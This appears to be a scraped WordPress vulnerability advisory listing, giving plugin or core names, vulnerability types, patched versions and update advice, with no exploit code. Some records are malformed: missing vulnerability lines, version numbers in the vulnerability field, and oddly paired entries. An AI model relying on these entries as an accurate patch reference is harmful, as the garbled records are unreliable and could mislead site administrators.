Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.5
Recommended Action: Update to version 3.8.5, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.4
Recommended Action: Update to version 1.15.4, or a newer patched version

Plugin: Adminimize

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.22
Recommended Action: Update to version 1.7.22, or a newer patched version

Plugin: All-in-One Video Gallery

Vulnerability: 2.6.0
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: SQL Injection
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Search Unleashed

Vulnerability: Cross-Site Scripting
Patched Version: 0.2.11
Recommended Action: Update to version 0.2.11, or a newer patched version

Plugin: CopyRightPro

Plugin: WPsc MijnPress

Plugin: Becustom

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.5.3
Recommended Action: Update to version 1.0.5.3, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) HTML Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP125

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Snow Monkey Forms

Vulnerability: Directory Traversal via ‘view’ REST endpiont
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Web-Stat Analytics – Free Real-Time Web Analytics

Vulnerability: API Key Disclosure
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: CSV Injection
Patched Version: 1.2.5.6
Recommended Action: Update to version 1.2.5.6, or a newer patched version

Plugin: PHP to Page

Vulnerability: Authenticated (Subscriber+) Local File Inclusion to Remote Code Execution via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Page Generator

Vulnerability: Cross-Site Request Forgery to Arbitrary Keywords Deletion/Duplication
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Authentication Bypass
Patched Version: 2.0.9.2
Recommended Action: Update to version 2.0.9.2, or a newer patched version

Plugin: If-So Dynamic Content Personalization

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 0.9.4.1
Recommended Action: Update to version 0.9.4.1, or a newer patched version

Plugin: Request For Quote

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Tagregator

Plugin: Wholesale Market for WooCommerce

Vulnerability: Authenticated (Administrator+) Arbitrary Log File Download
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Baidu Tongji generator

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.7.1
Recommended Action: Update to version 1.4.7.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in listenTosFieldSavingTask function
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Lightweight Sidebar Manager

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.1.13
Recommended Action: Update to version 8.1.13, or a newer patched version

Plugin: BuddyPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: WooCommerce Custom Registration Form

Plugin: WPB Show Core

Vulnerability: Unauthenticated Local File Inlclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mobile Events Manager

Vulnerability: Authenticated (Administrator+) CSV Injection
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Cross-Site Request Forgery on AJAX actions
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: Yellow Yard Searchbar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.12
Recommended Action: Update to version 2.8.12, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Reflected Cross-Site Scripting via ‘search’
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: User Activity Log

Vulnerability: Unauthenticated SQL Injection via username
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: EELV Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Level Four Store Front

Vulnerability: SQL Injection
Patched Version: 8.1.1
Recommended Action: Update to version 8.1.1, or a newer patched version

Plugin: IMDB Info Box

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Jeg Elementor Kit

Vulnerability: Authorization Bypass
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.3.9.1
Recommended Action: Update to version 1.3.9.1, or a newer patched version

Plugin: Booking Calendar – Event Calendar

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Scriptless Social Sharing

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Options
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: WPZOOM Portfolio Lite – Filterable Portfolio Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘addRedirectRule’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Ecommerce – Two Factor Authentication

Vulnerability: Two Factor Authentication <= 1.0.4
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.17
Recommended Action: Update to version 2.1.17, or a newer patched version

Plugin: XO Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: 2.9.7
Patched Version: 2.10.0
Recommended Action: Update to version 2.10.0, or a newer patched version

Plugin: Social Media Widget

Vulnerability: Spam Link Injection
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Information Exposure in Debug Logs
Patched Version: 2.12.7
Recommended Action: Update to version 2.12.7, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Unrestricted AJAX Actions allowing Privilege Escalation
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Widgets for Google Reviews

Vulnerability: Authenticated (Contributor+) Stored XSS
Patched Version: 9.8
Recommended Action: Update to version 9.8, or a newer patched version

Plugin: Homepage Pop-up

Plugin: Manager for Icomoon

Vulnerability: Unauthenticated Arbitrary File Upload via ‘upload’
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: FireStorm Professional Real Estate Plugin

Vulnerability: SQL Injections
Patched Version: 2.06.04
Recommended Action: Update to version 2.06.04, or a newer patched version

Plugin: Swifty Page Manager

Plugin: Jeeng Push Notifications

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Authenticated (Contributor+) Open Redirect via Shortcode
Patched Version: 1.2.29
Recommended Action: Update to version 1.2.29, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Simple Behance Portfolio

Plugin: Job Manager & Career – Manage job board listings, and recruitments

Vulnerability: Cross-Site Request Forgery to PHP Object Injection
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Location Manager

Vulnerability: SQL Injection
Patched Version: 2.1.0.10
Recommended Action: Update to version 2.1.0.10, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Multifactor Bypass
Patched Version: 8.9.3
Recommended Action: Update to version 8.9.3, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting via Avatar URL
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Icons Font Loader – Load Various Web Fonts & Icons on WP

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Easy Quiz Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Custom 404 Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 3.4.12
Recommended Action: Update to version 3.4.12, or a newer patched version

Plugin: Private Only

Plugin: TheCartPress eCommerce Shopping Cart

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.9.8.6
Recommended Action: Update to version 2.9.8.6, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Edit/Delete event via IDOR
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.7.2
Recommended Action: Update to version 1.0.7.2, or a newer patched version

Plugin: Constant Contact Forms

Vulnerability: Missing Authorization via constant_contact_optin_ajax_handler
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Translation Exchange – Translate Your WordPress Site In Minutes!

Plugin: cartflows-pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.12
Recommended Action: Update to version 1.11.12, or a newer patched version

Plugin: Customer Email Verification for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.93
Recommended Action: Update to version 1.0.93, or a newer patched version

Plugin: Backup Scheduler

Plugin: WP Forum Server

Vulnerability: SQL Injection
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Authenticated Insecure Direct Object References (IDOR)
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WiserNotify Social Proof & FOMO Notification, WooCommerce Sales Popup, Review Popups, Notification Bars & Urgency Widgets

Vulnerability: Missing Authorization
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Video Contest WordPress Plugin

Plugin: Live Chat from ClickDesk – Live Chat – Help Desk Plugin for Websites

Plugin: 123ContactForm for WordPress

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Arbitrary Options Deletion
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.96
Recommended Action: Update to version 2.5.96, or a newer patched version

Plugin: Mitsol Social Post Feed

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: Infusionsoft Gravity Forms Add-on

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Multiple Roles

Vulnerability: No subtitle
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Youtube Feeder

Plugin: Speed Booster Pack ⚡ PageSpeed Optimization Suite

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: WordPress Spreadsheet

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder

Vulnerability: Missing Authentication Bypass
Patched Version: 1.24.1
Recommended Action: Update to version 1.24.1, or a newer patched version

Plugin: Filtre de surveillance gouvernemental

Plugin: Business Hours Pro WordPress Plugin

Plugin: WC Serial Numbers – Ultimate License Manager for Selling, Licensing & Securely Delivering Digital Content with WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: POEditor

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.8
Recommended Action: Update to version 0.9.8, or a newer patched version

Plugin: Leadster

Vulnerability: Cross-Site Request Forgery via leadster_script_code_action
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: CSS & JavaScript Toolbox

Vulnerability: Information Exposure
Patched Version: 8.4.2
Recommended Action: Update to version 8.4.2, or a newer patched version

Plugin: Ultimate Profile Builder

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Short URL

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Keep Backup Daily

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Settings
Patched Version: 2.45.1
Recommended Action: Update to version 2.45.1, or a newer patched version

Plugin: Pricing Table Builder – AP Pricing Tables Lite

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.21.1
Recommended Action: Update to version 4.21.1, or a newer patched version

Plugin: Logo Showcase – Responsive Logo Carousel, Logo Slider & Logo Grid

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: All-in-One WP Migration Dropbox Extension

Vulnerability: Missing Authorization to Access Token Update
Patched Version: 3.76
Recommended Action: Update to version 3.76, or a newer patched version

Plugin: Inline Image Upload for BBPress

Vulnerability: Cross-Site Request Forgery via hm_bbpui_admin_page
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Missing Authorization to Stored Cross-Site Scripting and Settings Update
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: Woocommerce CSV importer

Vulnerability: Arbitrary File Deletion
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Under Construction, Coming Soon & Maintenance Mode

Vulnerability: Server Side Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Unauthenticated MailChimp API Key Disclosure
Patched Version: 1.3.71
Recommended Action: Update to version 1.3.71, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: WD WidgetTwitter

Vulnerability: Authenticated (Contributor+) SQL Injection via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Compact WP Audio Player

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Slickr Flickr

Plugin: My YouTube Channel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.23.0
Recommended Action: Update to version 3.23.0, or a newer patched version

Plugin: Afterpay Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Category and Page Icons

Vulnerability: Arbitrary File Upload and Deletion
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Form Submission Limit Bypass
Patched Version: 5.2.5.1
Recommended Action: Update to version 5.2.5.1, or a newer patched version

Plugin: WP Mail Log

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Incorrect Authorization
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.44
Recommended Action: Update to version 1.3.44, or a newer patched version

Plugin: MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0.9.2
Recommended Action: Update to version 4.0.9.2, or a newer patched version

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.40
Recommended Action: Update to version 3.1.40, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 7.4.2.2
Recommended Action: Update to version 7.4.2.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.8.2
Recommended Action: Update to version 3.5.8.2, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Unauthenticated iFrame Injection via Appointment Form
Patched Version: 1.3.73
Recommended Action: Update to version 1.3.73, or a newer patched version

Plugin: BP Group Documents

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 6.4.2.1
Recommended Action: Update to version 6.4.2.1, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: WordPress Live Chat Plugin for WooCommerce – LiveChat

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.17
Recommended Action: Update to version 2.2.17, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Unauthenticated Local File Inclusion via wdk_public_action
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.6
Recommended Action: Update to version 6.8.6, or a newer patched version

Plugin: Google XML Sitemaps Generator

Vulnerability: Authenticated (Admin+) PHP Code Injection
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary User Meta Update
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: WP Radio – Worldwide Online Radio Stations Directory for WordPress

Plugin: Leaflet Maps Marker Pro

Vulnerability: Path Traversal
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Login Logout Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Page Builder <= 2.3.11
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Missing Authorization on Option Changes
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: Protect WP Admin

Vulnerability: Cross-Site Scripting
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.002
Recommended Action: Update to version 3.9.002, or a newer patched version

Plugin: Recall Products

Plugin: CataBlog

Vulnerability: Authenticated (Editor+) Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Better Find and Replace

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: LoginWP (Formerly Peter's Login Redirect)

Vulnerability: Multiple Cross-Site Request Forgery vulnerabilities
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: WP Maintenance

Vulnerability: IP Restriction Bypass
Patched Version: 6.1.4
Recommended Action: Update to version 6.1.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: Information Disclosure via REST API
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Built-in Widgets Query extend (Custom Post Types & more)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.06
Recommended Action: Update to version 1.06, or a newer patched version

Plugin: Easy!Appointments

Vulnerability: Information Disclosure
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WordPress Content Slide

Plugin: CM Download Manager – Document and File Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.9.0
Recommended Action: Update to version 7.9.0, or a newer patched version

Plugin: ЮKassa для WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP EXtra

Vulnerability: Missing Authorization to .htaccess File Modification
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: FireStorm Shopping Cart eCommerce Plugin

Plugin: WP Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP-PostViews

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.63
Recommended Action: Update to version 1.63, or a newer patched version

Plugin: Video Central for WordPress

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authentication Bypass
Patched Version: 5.2.1.1
Recommended Action: Update to version 5.2.1.1, or a newer patched version

Plugin: FiboSearch – Ajax Search for WooCommerce

Vulnerability: AJAX Search for WooCommerce <= 1.23.0
Patched Version: 1.24.0
Recommended Action: Update to version 1.24.0, or a newer patched version

Plugin: Pop-up

Vulnerability: Privilege Escalation
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: FG Joomla to WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.31.0
Recommended Action: Update to version 3.31.0, or a newer patched version

Plugin: Schema Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: WP User Manager – User Profile Builder & Membership

Vulnerability: Arbitrary User Password Reset
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Unauthenticated Login Page Disclosure
Patched Version: 9.0.1
Recommended Action: Update to version 9.0.1, or a newer patched version

Plugin: Circles Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Admin Settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Infusionsoft Gravity Forms Add-on

Vulnerability: 1.5.10
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: Popup | Custom Popup Builder

Vulnerability: Missing Capabilities Check
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wow Forms – create any form with custom style

Plugin: wpml

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.9
Recommended Action: Update to version 3.1.9, or a newer patched version

Plugin: Sidebar Adder 2

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: WooCommerce Box Office

Vulnerability: Missing Authorization
Patched Version: 1.1.52
Recommended Action: Update to version 1.1.52, or a newer patched version

Plugin: Motor Racing League

Plugin: TS Webfonts for さくらのレンタルサーバ

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

